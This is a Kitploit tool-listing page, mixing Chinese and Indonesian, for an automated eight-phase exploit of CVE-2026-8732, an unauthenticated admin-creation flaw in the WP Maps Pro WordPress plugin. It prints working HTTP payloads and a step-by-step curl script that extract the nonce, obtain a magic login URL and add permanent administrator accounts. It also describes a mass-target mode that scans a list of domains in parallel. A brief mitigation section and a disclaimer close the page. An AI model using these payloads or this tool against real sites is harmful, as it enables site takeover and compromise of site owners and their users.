Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-8732 — 针对 CVE-2026-8732 的自动化 8 阶段漏洞利用程序,该漏洞是 WP Maps Pro ≤ 6.1.0 中未经验证的权限提升漏洞。使用 multiprocessing 和 asyncio 来扫描目标、提取 nonces 并创建管理员账户。 | Kitploit
工具/GitHubGitHub/zycoder0day/cve-2026-8732
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

针对 CVE-2026-8732 的自动化 8 阶段漏洞利用程序,该漏洞是 WP Maps Pro ≤ 6.1.0 中未经验证的权限提升漏洞。使用 multiprocessing 和 asyncio 来扫描目标、提取 nonces 并创建管理员账户。

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — 未认证权限提升

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

8 阶段自动化利用 | Multiprocessing + Asyncio | 已验证的管理员创建


🎯 关于漏洞

WordPress 插件 WP Maps Pro 版本 ≤ 6.1.0 存在未认证权限提升漏洞。攻击者无需任何凭据即可创建 administrator 帐户并完全控制网站。

该漏洞源于专为 FlipperCode 供应商支持团队设计的 "Temporary Access" 功能,但该功能在缺乏充分保护的情况下暴露给公众。

信息详情
CVECVE-2026-8732
CVSS9.8(严重)— AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
插件WP Maps Pro (wp-google-map-gold)
供应商FlipperCode
受影响版本≤ 6.1.0
已修补版本6.1.1
类型关键功能缺少身份验证 (CWE-306)
影响未认证创建管理员 → 完全控制网站
PoC 作者XENON1337

🔥 三个相关弱点

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  KELEMAHAN 1 — Endpoint Terekspos Tanpa Autentikasi        │
│  ▸ AJAX action didaftarkan dengan wp_ajax_nopriv_           │
│  ▸ Siapapun bisa mengakses tanpa login                      │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 2 — Nonce Bocor di Halaman Publik               │
│  ▸ Objek wpgmp_local.nonce disematkan di setiap halaman    │
│  ▸ Penyerang bisa mengekstrak nonce dari HTML source        │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  KELEMAHAN 3 — Tidak Ada Pemeriksaan Hak Akses             │
│  ▸ Fungsi callback hanya memverifikasi nonce               │
│  ▸ Tidak ada current_user_can() — tidak ada pertahanan lain│
└──────────────────────────────────────────────────────────────┘

⚡ 攻击链 — 8 阶段

root@kitploit:~
  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 1  │──▶│ FASE 2   │──▶│ FASE 3   │──▶│ FASE 4   │
  │ RESOLVE │   │ CHECK WP │   │ DETECT   │   │ VERSION  │
  │ HTTPS?  │   │ wp-content│   │ PLUGIN   │   │ ≤6.1.0?  │
  │ HTTP?   │   │ wp-login  │   │ wpgmp_   │   │ WAF?     │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ RENTAN
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │                    FASE 5 — EKSTRAKSI NONCE               │
  │                                                          │
  │  GRUP A (API)          GRUP B (Konten)      GRUP C      │
  │  ├─ M1: REST pages    ├─ M4: Sitemap XML   └─ M7: Slug  │
  │  ├─ M2: REST search   ├─ M5: Homepage links    Brute    │
  │  └─ M3: rest_route    └─ M6: RSS/Atom feed   Force     │
  │                                                          │
  │  Target: wpgmp_local.nonce = "fc-call-nonce"             │
  └──────────────────────────┬───────────────────────────────┘
                             │ NONCE DITEMUKAN
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ FASE 6   │──▶│ FASE 7   │──▶│ FASE 8   │
  │ EXPLOIT  │   │ VERIFY   │   │ ADD ADMIN│
  │ POST AJAX│   │ Magic URL│   │ PERMANEN │
  │ nonce+   │   │ Cookie   │   │ REST API │
  │ check_   │   │ login    │   │ WP-Admin │
  │ temp=false│   │ check    │   │ Form     │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ ADMIN DIBUAT
                               Login: wp_xxxx / pass
                               Role: administrator

各阶段详情


🛠️ 攻击方法

方法 1:核心利用 — 未认证创建管理员

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<EKSTRAKSI_NONCE>
check_temp=false

若存在漏洞,响应为:

root@kitploit:~
{"url":"https://target.com/?wpgmp_access=abc123def456"}

该 Magic URL 会以 fc_user_XXXXX(角色:administrator)的身份提供自动登录。

方法 2:通过 REST API 永久添加管理员

root@kitploit:~
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

方法 3:通过 WP-Admin 表单添加管理员(备用)

root@kitploit:~
POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- KUNCI: konfirmasi password lemah
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

关键点: 必须包含 pw_weak=1 — 没有此参数,WordPress 会拒绝弱密码。


📐 架构

root@kitploit:~
CVE-2026-8732.py
│
├── 📦 NonceFinder — Pencari nonce dengan 7 metode
│   ├── Grup A (API): M1 REST pages, M2 REST search, M3 rest_route
│   ├── Grup B (Konten): M4 Sitemap, M5 Homepage links, M6 RSS feed
│   └── Grup C (Paksa): M7 Slug brute force (30+ slug umum)
│
├── ⚔️ Exploiter — Mesin eksploitasi 8 fase
│   ├── resolve()           → Fase 1: Pemilihan protokol
│   ├── check_wp()           → Fase 2: Verifikasi WordPress
│   ├── detect_plugin()      → Fase 3: Deteksi plugin + early nonce
│   ├── detect_version()     → Fase 4: Deteksi versi + WAF
│   ├── exploit()            → Fase 6: Eksploitasi inti
│   ├── verify()             → Fase 7: Verifikasi login admin
│   └── add_admin()          → Fase 8: Tambah admin permanen
│
├── 🔧 Worker Process — Proses pekerja multiprocessing
│   ├── producer()           → Baca domain dari mp.Queue
│   └── consumer() (N)       → Eksekusi scan paralel
│
└── 🖥️ Scanner — Antarmuka pengguna
    ├── single()             → Mode target tunggal (interaktif)
    └── multi()              → Mode multi-target (massal)

数据流

root@kitploit:~
  targets.txt          mp.Queue (tugas)         asyncio.Queue
  ┌─────────┐    ┌─────────────────┐    ┌──────────────────┐
  │ domain1 │───▶│  domain queue   │───▶│  internal queue  │
  │ domain2 │    │  (IPC antara    │    │  (per proses)    │
  │ domain3 │    │   proses)       │    └────────┬─────────┘
  │  ...    │    └─────────────────┘              │
  └─────────┘                          ┌─────────▼──────────┐
                                       │   Konsumen (N)      │
                                       │   Exploiter.scan()  │
                                       │   8 fase lengkap    │
                                       └─────────┬──────────┘
                                                 │
                                       ┌─────────▼──────────┐
                                       │  mp.Queue (hasil)   │──▶ vuln.txt
                                       │  + JSON + TXT       │    + debug.log
                                       └────────────────────┘

🚀 使用方法

安装

root@kitploit:~
pip install aiohttp

单目标模式

root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
  [?] Pilih mode:
      1. Single Target
      2. Multi Target (file list)

  > 1

  [?] Target domain (tanpa http/https): target.com
  [?] Timeout [default: 15]: 15

多目标模式(批量)

root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
  [?] Pilih mode:
      1. Single Target
      2. Multi Target (file list)

  > 2

  [?] Path file target (.txt): targets.txt
  [?] Jumlah process [default: 10]: 10
  [?] Concurrency per process [default: 50]: 50
  [?] Timeout per request [default: 10]: 10
  [?] Output file [default: vuln.txt]: vuln.txt
  [?] Debug mode? (y/n) [default: n]: y

使用 curl 的手动示例

root@kitploit:~
# LANGKAH 1: Ekstrak nonce dari halaman frontend
NONCE=$(curl -sk https://target.com/ | grep -oP '"nonce"\s*:\s*"\K[a-f0-9]{10}')
echo "Nonce: $NONCE"

# LANGKAH 2: Kirim payload eksploitasi
RESPONSE=$(curl -sk -X POST https://target.com/wp-admin/admin-ajax.php \
  -d "action=wpgmp_temp_access_ajax&nonce=$NONCE&check_temp=false")
echo "Response: $RESPONSE"

# LANGKAH 3: Akses magic URL untuk login sebagai admin
MAGIC_URL=$(echo $RESPONSE | python3 -c "import sys,json; print(json.load(sys.stdin)['url'])")
curl -sk -L -c cookies.txt "$MAGIC_URL"

# LANGKAH 4: Verifikasi akses admin
curl -sk -b cookies.txt https://target.com/wp-admin/profile.php | grep 'id="user_login"'

# LANGKAH 5: Buat admin permanen via REST API atau WP-Admin form

📊 利用条件

仅当以下两个条件均满足时,管理员才能成功创建:

root@kitploit:~
  ┌───────────────┐    ┌───────────────┐
  │  KONDISI 1    │ AND│  KONDISI 2    │
  │  Versi ≤6.1.0│    │  GOLD AKTIF   │
  │               │    │               │
  └───────┬───────┘    └───────┬───────┘
          │                    │
          ▼                    ▼
  Aksi nopriv        WPGMP_Temp_
  masih terdaftar    Access tersedia
          │                    │
          └────────┬─────────┘
                   ▼
             ✅ ADMIN DIBUAT
条件失败的情况结果
版本 ≥ 6.1.1❌ 已修补 — wp_ajax_nopriv_ 操作已删除
GOLD 未激活⚠️ PHP 崩溃 — WPGMP_Temp_Access 类不存在

📁 文件结构

root@kitploit:~
CVE-2026-8732/
├── CVE-2026-8732.py      # Skrip eksploitasi otomatis
├── README.md              # Dokumentasi proyek (file ini)
└── LICENSE                # MIT License

⚙️ 技术栈


🛡️ 缓解措施

如果您是使用 WP Maps Pro 的网站所有者:

  1. 更新到 6.1.1 或更高版本 — 这将修补该漏洞
  2. 确保 GOLD 插件已激活 — 如果 GOLD 已安装但未激活,网站将处于易受攻击状态(利用时会崩溃,但危险操作仍然暴露)
  3. 安装 WAF(Wordfence / Sucuri)以阻止对 admin-ajax.php 的 POST 请求
  4. 禁用 REST API users 端点 — 该端点会泄露用户列表
  5. 限制登录尝试次数 — 防止暴力破解

📜 许可证

root@kitploit:~
MIT License

Copyright (c) 2026 XENON1337

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⚠️ 免责声明

本工具仅供合法使用。 仅可在您拥有或获得明确测试许可的系统上使用。未经授权的使用是非法的且不道德的。作者不对该工具的滥用承担任何责任。


由 XENON1337 制作

下载工具
阶段名称功能请求数
1Resolve并行选择 HTTPS/HTTP1
2Check WP验证目标是否为 WordPress0
3Detect Plugin在 3 个层面检查 WP Maps 特征0-4
4Version + WAF读取 readme.txt / CSS ?ver= + 检测 WAF1
5Nonce 提取3 个并行组共 7 种搜索方法0-150
6漏洞利用POST admin-ajax.php → 创建临时管理员帐户1
7验证访问 magic URL → 确认管理员会话2
8添加管理员REST API(主要)+ WP-Admin 表单(备用)4
组件技术功能
HTTP 客户端aiohttp支持连接池的异步 HTTP 请求
并行处理asyncio + multiprocessing多进程 + 每进程异步
IPC 队列mp.Queue主进程与工作进程之间的通信
CookieCookieJar(unsafe=True)处理跨域重定向
超时asyncio.wait_for每个目标的超时限制(25 秒)